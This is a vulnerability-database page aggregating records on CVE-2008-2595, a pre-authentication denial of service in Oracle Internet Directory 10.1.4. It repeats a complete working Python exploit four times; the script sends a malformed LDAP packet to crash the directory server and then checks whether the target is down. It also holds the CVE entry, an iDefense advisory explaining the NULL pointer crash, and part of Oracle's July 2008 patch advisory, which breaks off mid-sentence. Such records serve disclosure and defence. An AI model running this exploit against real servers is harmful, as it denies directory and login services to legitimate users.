Oracle Internet Directory 10.1.4 - Remote Denial of Service

2008-07-19T00:00:00

Description

{"lastseen": "2020-04-01T19:04:39", "references": [], "description": "\nOracle Internet Directory 10.1.4 - Remote Denial of Service", "edition": 2, "reporter": "Joxean Koret", "exploitpack": {"type": "dos", "platform": "multiple"}, "published": "2008-07-19T00:00:00", "title": "Oracle Internet Directory 10.1.4 - Remote Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1343"]}, {"type": "cve", "idList": ["CVE-2008-2595"]}, {"type": "exploitdb", "idList": ["EDB-ID:6101"]}, {"type": "nessus", "idList": ["ORACLE_APPLICATION_SERVER_PCI.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2008-090335"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:68369"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20166", "SECURITYVULNS:DOC:20167", "SECURITYVULNS:VULN:9153"]}, {"type": "seebug", "idList": ["SSV:65604", "SSV:9306"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1343"]}, {"type": "cve", "idList": ["CVE-2008-2595"]}, {"type": "exploitdb", "idList": ["EDB-ID:6101"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9153"]}, {"type": "seebug", "idList": ["SSV:9306"]}]}, "exploitation": null, "vulnersScore": 5.2}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2595"], "modified": "2008-07-19T00:00:00", "id": "EXPLOITPACK:B095EADDF6B9035B988763688D9BAF1E", "href": "", "viewCount": 3, "sourceData": "#!/usr/bin/python\n\n\"\"\"\nOracle Internet Directory 10.1.4 preauthentication Denial Of Service\n\nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.\nSometimes you need 2 shoots to crash OID completely. The server \"commonly\" tolerates one\nshoot, but even when you only send one packet it will crash.\n\nTested: Win2000 x86, WinXP x86, Win2003 X86_64\n\nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)\n\nFixed: Oracle Critical Patch Update July 2008\nCVEID: CVE-2008-2595\n\"\"\"\n\nimport sys\nimport time\nimport socket\n\nhealthPacket = \"0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00\"\npacket = \"\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00\"\n\ndef checkHealth(hostname, port):\n print \" --> Wating 5 seconds\"\n time.sleep(5)\n \n print \" --> Connecting to target...\"\n socket.setdefaulttimeout(5)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((hostname, port))\n\n try:\n print \" --> Sending 'health' packet ...\"\n s.sendall(healthPacket)\n print \" --> Trying to receive something...\"\n data = s.recv(1024)\n except:\n err = sys.exc_info()[1]\n\n if int(err[0]) == 104:\n print \"[+] Exploits works!\"\n return\n\n if data != \"\":\n print \"[!] Server is up and running :(\"\n else:\n print \"[?] Server doesn't answer nothing. It works?\"\n\ndef oidDos(hostname, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n print \"[+] Connecting to ldap://%s:%d...\" % (hostname, port)\n s.connect((hostname, int(port)))\n\n print \"[+] Sending packet...\"\n s.sendall(packet)\n s.close()\n\n print \"[+] Checking OID's health...\"\n checkHealth(hostname, port)\n except:\n print sys.exc_info()[1]\n\ndef usage():\n print \"Oracle Internet Directory 10.1.4 Remote Preauthentication DOS\"\n print \"Copyright (c) 2007 Joxean Koret\"\n print\n print \"Usage:\"\n print sys.argv[0],\"-h<hostname> -p<port>\"\n print\n\ndef main():\n if len(sys.argv) != 3:\n usage()\n sys.exit(0)\n \n hostname = None\n port = None\n\n i = 0\n for param in sys.argv:\n i += 1\n \n if i == 1:\n continue\n \n if param.startswith(\"-h\"):\n hostname = param[2:]\n elif param.startswith(\"-p\"):\n port = int(param[2:])\n else:\n print \"Unknown option '%s'\" % param\n usage()\n sys.exit(1)\n \n if not hostname or not port:\n print \"Bad command line.\"\n usage()\n sys.exit(1)\n\n oidDos(hostname, port)\n\nif __name__ == \"__main__\":\n main()\n\n# milw0rm.com [2008-07-19]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "scheme": null, "_state": {"dependencies": 1647589307, "score": 0}}

{"seebug": [{"lastseen": "2017-11-19T21:31:29", "description": "No description provided by source.", "cvss3": {}, "published": "2008-08-17T00:00:00", "title": "Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2008-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-9306", "id": "SSV:9306", "sourceData": "\n #!/usr/bin/python\r\n\r\n"""\r\nOracle Internet Directory 10.1.4 preauthentication Denial Of Service\r\n\r\nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.\r\nSometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one\r\nshoot, but even when you only send one packet it will crash.\r\n\r\nTested: Win2000 x86, WinXP x86, Win2003 X86_64\r\n\r\nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)\r\n\r\nFixed: Oracle Critical Patch Update July 2008\r\nCVEID: CVE-2008-2595\r\n"""\r\n\r\nimport sys\r\nimport time\r\nimport socket\r\n\r\nhealthPacket = "0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00"\r\npacket = "\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00"\r\n\r\ndef checkHealth(hostname, port):\r\n print " --> Wating 5 seconds"\r\n time.sleep(5)\r\n \r\n print " --> Connecting to target..."\r\n socket.setdefaulttimeout(5)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((hostname, port))\r\n\r\n try:\r\n print " --> Sending 'health' packet ..."\r\n s.sendall(healthPacket)\r\n print " --> Trying to receive something..."\r\n data = s.recv(1024)\r\n except:\r\n err = sys.exc_info()[1]\r\n\r\n if int(err[0]) == 104:\r\n print "[+] Exploits works!"\r\n return\r\n\r\n if data != "":\r\n print "[!] Server is up and running :("\r\n else:\r\n print "[?] Server doesn't answer nothing. It works?"\r\n\r\ndef oidDos(hostname, port):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n print "[+] Connecting to ldap://%s:%d..." % (hostname, port)\r\n s.connect((hostname, int(port)))\r\n\r\n print "[+] Sending packet..."\r\n s.sendall(packet)\r\n s.close()\r\n\r\n print "[+] Checking OID's health..."\r\n checkHealth(hostname, port)\r\n except:\r\n print sys.exc_info()[1]\r\n\r\ndef usage():\r\n print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"\r\n print "Copyright (c) 2007 Joxean Koret"\r\n print\r\n print "Usage:"\r\n print sys.argv[0],"-h<hostname> -p<port>"\r\n print\r\n\r\ndef main():\r\n if len(sys.argv) != 3:\r\n usage()\r\n sys.exit(0)\r\n \r\n hostname = None\r\n port = None\r\n\r\n i = 0\r\n for param in sys.argv:\r\n i += 1\r\n \r\n if i == 1:\r\n continue\r\n \r\n if param.startswith("-h"):\r\n hostname = param[2:]\r\n elif param.startswith("-p"):\r\n port = int(param[2:])\r\n else:\r\n print "Unknown option '%s'" % param\r\n usage()\r\n sys.exit(1)\r\n \r\n if not hostname or not port:\r\n print "Bad command line."\r\n usage()\r\n sys.exit(1)\r\n\r\n oidDos(hostname, port)\r\n\r\nif __name__ == "__main__":\r\n main()\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9306", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T14:48:37", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65604", "id": "SSV:65604", "sourceData": "\n #!/usr/bin/python\r\n\r\n"""\r\nOracle Internet Directory 10.1.4 preauthentication Denial Of Service\r\n\r\nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.\r\nSometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one\r\nshoot, but even when you only send one packet it will crash.\r\n\r\nTested: Win2000 x86, WinXP x86, Win2003 X86_64\r\n\r\nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)\r\n\r\nFixed: Oracle Critical Patch Update July 2008\r\nCVEID: CVE-2008-2595\r\n"""\r\n\r\nimport sys\r\nimport time\r\nimport socket\r\n\r\nhealthPacket = "0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00"\r\npacket = "\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00"\r\n\r\ndef checkHealth(hostname, port):\r\n print " --> Wating 5 seconds"\r\n time.sleep(5)\r\n \r\n print " --> Connecting to target..."\r\n socket.setdefaulttimeout(5)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((hostname, port))\r\n\r\n try:\r\n print " --> Sending 'health' packet ..."\r\n s.sendall(healthPacket)\r\n print " --> Trying to receive something..."\r\n data = s.recv(1024)\r\n except:\r\n err = sys.exc_info()[1]\r\n\r\n if int(err[0]) == 104:\r\n print "[+] Exploits works!"\r\n return\r\n\r\n if data != "":\r\n print "[!] Server is up and running :("\r\n else:\r\n print "[?] Server doesn't answer nothing. It works?"\r\n\r\ndef oidDos(hostname, port):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n print "[+] Connecting to ldap://%s:%d..." % (hostname, port)\r\n s.connect((hostname, int(port)))\r\n\r\n print "[+] Sending packet..."\r\n s.sendall(packet)\r\n s.close()\r\n\r\n print "[+] Checking OID's health..."\r\n checkHealth(hostname, port)\r\n except:\r\n print sys.exc_info()[1]\r\n\r\ndef usage():\r\n print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"\r\n print "Copyright (c) 2007 Joxean Koret"\r\n print\r\n print "Usage:"\r\n print sys.argv[0],"-h<hostname> -p<port>"\r\n print\r\n\r\ndef main():\r\n if len(sys.argv) != 3:\r\n usage()\r\n sys.exit(0)\r\n \r\n hostname = None\r\n port = None\r\n\r\n i = 0\r\n for param in sys.argv:\r\n i += 1\r\n \r\n if i == 1:\r\n continue\r\n \r\n if param.startswith("-h"):\r\n hostname = param[2:]\r\n elif param.startswith("-p"):\r\n port = int(param[2:])\r\n else:\r\n print "Unknown option '%s'" % param\r\n usage()\r\n sys.exit(1)\r\n \r\n if not hostname or not port:\r\n print "Bad command line."\r\n usage()\r\n sys.exit(1)\r\n\r\n oidDos(hostname, port)\r\n\r\nif __name__ == "__main__":\r\n main()\r\n\r\n# milw0rm.com [2008-07-19]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-65604", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:05", "description": "", "cvss3": {}, "published": "2008-07-21T00:00:00", "type": "packetstorm", "title": "oracleidir-dos.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2008-07-21T00:00:00", "id": "PACKETSTORM:68369", "href": "https://packetstormsecurity.com/files/68369/oracleidir-dos.txt.html", "sourceData": "`#!/usr/bin/python \n \n\"\"\" \nOracle Internet Directory 10.1.4 preauthentication Denial Of Service \n \nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. \nSometimes you need 2 shoots to crash OID completely. The server \"commonly\" tolerates one \nshoot, but even when you only send one packet it will crash. \n \nTested: Win2000 x86, WinXP x86, Win2003 X86_64 \n \nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es) \n \nFixed: Oracle Critical Patch Update July 2008 \nCVEID: CVE-2008-2595 \n\"\"\" \n \nimport sys \nimport time \nimport socket \n \nhealthPacket = \"0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00\" \npacket = \"\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00\" \n \ndef checkHealth(hostname, port): \nprint \" --> Wating 5 seconds\" \ntime.sleep(5) \n \nprint \" --> Connecting to target...\" \nsocket.setdefaulttimeout(5) \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((hostname, port)) \n \ntry: \nprint \" --> Sending 'health' packet ...\" \ns.sendall(healthPacket) \nprint \" --> Trying to receive something...\" \ndata = s.recv(1024) \nexcept: \nerr = sys.exc_info()[1] \n \nif int(err[0]) == 104: \nprint \"[+] Exploits works!\" \nreturn \n \nif data != \"\": \nprint \"[!] Server is up and running :(\" \nelse: \nprint \"[?] Server doesn't answer nothing. It works?\" \n \ndef oidDos(hostname, port): \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nprint \"[+] Connecting to ldap://%s:%d...\" % (hostname, port) \ns.connect((hostname, int(port))) \n \nprint \"[+] Sending packet...\" \ns.sendall(packet) \ns.close() \n \nprint \"[+] Checking OID's health...\" \ncheckHealth(hostname, port) \nexcept: \nprint sys.exc_info()[1] \n \ndef usage(): \nprint \"Oracle Internet Directory 10.1.4 Remote Preauthentication DOS\" \nprint \"Copyright (c) 2007 Joxean Koret\" \nprint \nprint \"Usage:\" \nprint sys.argv[0],\"-h<hostname> -p<port>\" \nprint \n \ndef main(): \nif len(sys.argv) != 3: \nusage() \nsys.exit(0) \n \nhostname = None \nport = None \n \ni = 0 \nfor param in sys.argv: \ni += 1 \n \nif i == 1: \ncontinue \n \nif param.startswith(\"-h\"): \nhostname = param[2:] \nelif param.startswith(\"-p\"): \nport = int(param[2:]) \nelse: \nprint \"Unknown option '%s'\" % param \nusage() \nsys.exit(1) \n \nif not hostname or not port: \nprint \"Bad command line.\" \nusage() \nsys.exit(1) \n \noidDos(hostname, port) \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/68369/oracleidir-dos.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T12:17:31", "description": "Unspecified vulnerability in the Oracle Internet Directory component in Oracle Application Server 9.0.4.3, 10.1.2.3, and 10.1.4.2 has unknown impact and remote attack vectors. NOTE: the previous information was obtained from the Oracle July 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a denial of service (crash) via a malformed LDAP request that triggers a NULL pointer dereference.", "cvss3": {}, "published": "2008-07-15T23:41:00", "type": "cve", "title": "CVE-2008-2595", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2595"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:oracle:database_10g:10.1.4.2", "cpe:/a:oracle:database_10g:10.1.2.3", "cpe:/a:oracle:database_9i:9.0.4.3"], "id": "CVE-2008-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2595", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:database_9i:9.0.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.1.2.3:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "description": "iDefense Security Advisory 07.15.08\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nJul 15, 2008\r\n\r\nI. BACKGROUND\r\n\r\nInternet Directory is Oracle's implementation of the Lightweight\r\nDirectory Access Protocol (LDAP) v3 service. It is used in conjunction\r\nwith Oracle Identity Management to implement user administration in the\r\nOracle environment. More information can be found at the following URL.\r\n\r\nhttp://www.oracle.com/technology/products/oid/index.html\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a pre-authentication input validation\r\nvulnerability in Oracle Corp.'s Oracle Internet Directory allows an\r\nattacker to conduct a denial of service attack on a vulnerable host.\r\n\r\nInternet Directory consists of two processes. One process acts as a\r\nlistener. It handles incoming connections and passes them off to the\r\nsecond process. The second process, which handles requests, contains\r\nthe vulnerability.\r\n\r\nWhen processing a malformed LDAP request, it is possible to cause the\r\nhandler to dereference a NULL pointer. This results in the process\r\ncrashing. Future connection requests will be accepted by the listener\r\nprocess, and then immediately closed when it finds that there is no\r\nhandler process running.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability allows an attacker to deny service to\r\nlegitimate users of the directory server. In order to exploit this\r\nissue, an attacker must be able to establish an LDAP session with the\r\nvulnerable server. This is typically done via TCP port 389 or the\r\nSSL-enabled TCP port 636. No authentication is needed. In order to\r\nrestore functionality, the listener process must be stopped and\r\nrestarted.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of this vulnerability in Oracle\r\nInternet Directory for Windows version 10.1.4.0.1 with the April 2007\r\nCPU installed. Previous versions may also be affected.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any workarounds for this issue.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle Corp. has addressed this vulnerability with the release of their\r\nJuly 2008 Critical Patch Update. For more information, visit the\r\nfollowing URL.\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2008-2595 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n05/11/2007 Initial vendor notification\r\n05/11/2007 Initial vendor response\r\n07/15/2008 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was reported to iDefense by Joxean Koret.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2008 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "edition": 1, "cvss3": {}, "published": "2008-07-18T00:00:00", "title": "iDefense Security Advisory 07.15.08: Oracle Internet Directory Pre-Authentication LDAP DoS Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2008-07-18T00:00:00", "id": "SECURITYVULNS:DOC:20167", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20167", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:26", "description": "Oracle Critical Patch Update Advisory - July 2008\r\nDescription\r\n\r\nA Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\r\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\r\n\r\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 45 new security fixes across all products.\r\nSupported Products and Components Affected\r\n\r\nSecurity vulnerabilities addressed by this Critical Patch Update affect the products listed in the categories below. The product area of the patches for the listed versions is shown in [square brackets] following the product versions. Please click on the link in [square brackets] or in the Patch Availability Table to access the documentation for those patches.\r\nCategory I\r\n\r\nProduct releases and versions that are in Premier Support or Extended Support, under the Oracle Lifetime Support policy:\r\n\u2022 Oracle Database 11g, version 11.1.0.6 \t [ Database ]\r\n\u2022 Oracle Database 10g Release 2, versions 10.2.0.2, 10.2.0.3, 10.2.0.4 \t [ Database ]\r\n\u2022 Oracle Database 10g, version 10.1.0.5 \t [ Database ]\r\n\u2022 Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV \t [ Database ]\r\n\u2022 Oracle TimesTen In-Memory Database version 7.0.3.0.0 \t [ Database ]\r\n\u2022 Oracle Application Server 10g Release 3 (10.1.3), versions 10.1.3.1.0, 10.1.3.3.0 \t [ Application Server ]\r\n\u2022 Oracle Application Server 10g Release 2 (10.1.2), versions 10.1.2.2.0, 10.1.2.3.0 \t [ Application Server ]\r\n\u2022 Oracle Application Server 10g (9.0.4), version 9.0.4.3 \t [ Application Server ]\r\n\u2022 Oracle Hyperion BI Plus version 9.2.0.3, 9.2.1.0,and 9.3.1.0 \t [ Application Server ]\r\n\u2022 Oracle Hyperion Performance Suite version 8.3.2.4, and 8.5.0.3 \t [ Application Server ]\r\n\u2022 Oracle E-Business Suite Release 12, version 12.0.4 \t [ E-Business Suite ]\r\n\u2022 Oracle E-Business Suite Release 11i, version 11.5.10.2 \t [ E-Business Suite ]\r\n\u2022 Oracle Enterprise Manager Database Control 11i version 11.1.0.6 \t [ Enterprise Manager ]\r\n\u2022 Oracle Enterprise Manager Database Control 10g Release 2, versions 10.2.0.2, 10.2.0.3, 10.2.0.4 \t [ Enterprise Manager ]\r\n\u2022 Oracle Enterprise Manager Database Control 10g Release 1, version 10.1.0.5 \t [ Enterprise Manager ]\r\n\u2022 Oracle Enterprise Manager Grid Control 10g Release 1, versions 10.1.0.5, 10.1.0.6 \t [ Enterprise Manager ]\r\n\u2022 Oracle PeopleSoft Enterprise PeopleTools versions 8.48.17, 8.49.11 \t [ PeopleSoft/JDE ]\r\n\u2022 Oracle PeopleSoft Enterprise CRM version 8.9, 9.0 \t [ PeopleSoft/JDE ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 10.0 released through MP1 \t [ BEA ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 9.0, 9.1, 9.2 released through MP3 \t [ BEA ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 8.1 released through SP6 \t [ BEA ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 7.0 released through SP7 \t [ BEA ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 6.1 released through SP7 \t [ BEA ]\r\nCategory II\r\n\r\nProducts and components that are bundled with the products listed in Category I.\r\nNo products in this category are affected by the fixes included in this Critical Patch Update.\r\nCategory III\r\n\r\nProducts that are de-supported as a standalone installation but are supported when installed with the products listed in Category I:\r\n\u2022 Oracle Database 9i, version 9.0.1.5 FIPS+ \t [ Application Server ]\r\n\u2022 Oracle Application Server 9i Release 1, version 1.0.2.2 \t [ E-Business Suite ]\r\n\r\nPatches for Category III products are only available when these products are installed as part of Category I products, and are tested solely on supported configurations and environments. Please refer to the documentation for each product for specific details concerning the support and availability of patches.\r\n\r\nPatch Availability Table and Risk Matrices\r\n\r\nThe Oracle Database, Oracle Application Server, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite Applications (Release 12 only), JD Edwards EnterpriseOne, JD Edwards OneWorld Tools, PeopleSoft Enterprise Portal Applications, PeopleSoft Enterprise PeopleTools and Siebel Enterprise patches in the Updates are cumulative; patches for any product included in a Critical Patch Update will include all fixes for that product from the previous Critical Patch Updates.\r\n\r\nOracle E-Business Suite Applications Release 11i patches are not cumulative, so Oracle E-Business Suite Applications customers should refer to previous Critical Patch Updates to identify previous security fixes they want to apply. Oracle Collaboration Suite patches were cumulative up to and including the fixes provided in the July 2007 Critical Patch Update. From the July 2007 Critical Patch Update on, Oracle Collaboration Suite security fixes are delivered using the one-off patch infrastructure normally used by Oracle to deliver single bug fixes to customers. Patches for BEA products are not cumulative (unless otherwise stated), so BEA customers should refer to previous Security Advisories to identify previous security fixes they want to apply.\r\n\r\nFor each Oracle product being administered, please consult the documentation for patch availability information and installation instructions referenced from the following table. For an overview of the Oracle product documentation related to this Critical Patch Update, please refer to the Oracle Critical Patch Update July 2008 Documentation Map, MetaLink Note 605152.1.\r\nProduct \tRisk Matrix \tPatch Availability and Installation Information\r\nOracle Database \tAppendix A - Oracle Database Risk Matrix \tCritical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products, MetaLink Note 579278.1\r\nOracle Application Server \tAppendix B - Oracle Application Server Risk Matrix \tCritical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products, MetaLink Note 579278.1\r\nOracle Collaboration Suite \tSee Critical Patch Update Advisory-Jan-2008 for last set of vulnerabilities fixed for Oracle Collaboration Suite \tCritical Patch Update Advisory-Jan-2008\r\nOracle E-Business Suite and Applications \tAppendix D - Oracle E-Business Suite and Applications Risk Matrix \tE-Business Suite Critical Patch Update Note, MetaLink Note 605117.1\r\nOracle Enterprise Manager \tAppendix E - Enterprise Manager Risk Matrix \tCritical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products, MetaLink Note 579278.1\r\nOracle PeopleSoft Enterprise and JD Edwards EnterpriseOne \tAppendix F - Oracle PeopleSoft and JD Edwards Applications Risk Matrix \tOracle PeopleSoft Enterprise and JD Edwards EnterpriseOne Advisories\r\nOracle Siebel Enterprise \tSee Critical Patch Update Advisory-Apr-2008 for last set of vulnerabilities fixed for Siebel products \tCritical Patch Update Advisory-Apr-2008\r\nOracle WebLogic Server \tAppendix H - BEA Product Suite Risk Matrix \tSecurity Advisories for BEA Products\r\n\r\n\r\nRisk Matrix Content\r\n\r\nRisk matrices list only security vulnerabilities that are newly fixed by the patches associated with this advisory. Risk matrices for previous security fixes can be found in previous Critical Patch Update advisories.\r\n\r\nSeveral vulnerabilities addressed in this Critical Patch Update affect multiple products. The same vulnerability appears with the same Vuln # in all risk matrices. Italics indicate vulnerabilities in code included from other product areas.\r\n\r\nSecurity vulnerabilities are scored using CVSS version 2.0 (see Oracle CVSS Scoring). Oracle conducts an analysis of each security vulnerability addressed by a Critical Patch Update (CPU). Oracle does not disclose information about the security analysis, but the resulting Risk Matrix and associated documentation provide information about the type of vulnerability, the conditions required to exploit it, and the potential result of a successful exploit. Oracle provides this information, in part, so that customers may conduct their own risk analysis based on the particulars of their product usage. As a matter of policy, Oracle does not disclose detailed information about an exploit condition or results that can be used to conduct a successful exploit. Oracle will not provide additional information about the specifics of vulnerabilities beyond what is provided in the CPU or Security Alert notification, the Patch Availability Matrix, the readme files, and FAQs. Oracle does not provide advance notification on CPUs or Security Alerts to individual customers. Finally, Oracle does not distribute exploit code or \u201cproof-of-concept\u201d code for product vulnerabilities.\r\n\r\nStarting in the July, 2008 Critical Patch Update, Oracle will use Common Vulnerabilities and Exposures (CVE) identifiers rather than Oracle proprietary identifiers for identifying vulnerabilities (Vuln#) in Risk Matrices(see FAQ). Common Vulnerabilities and Exposures maintains a 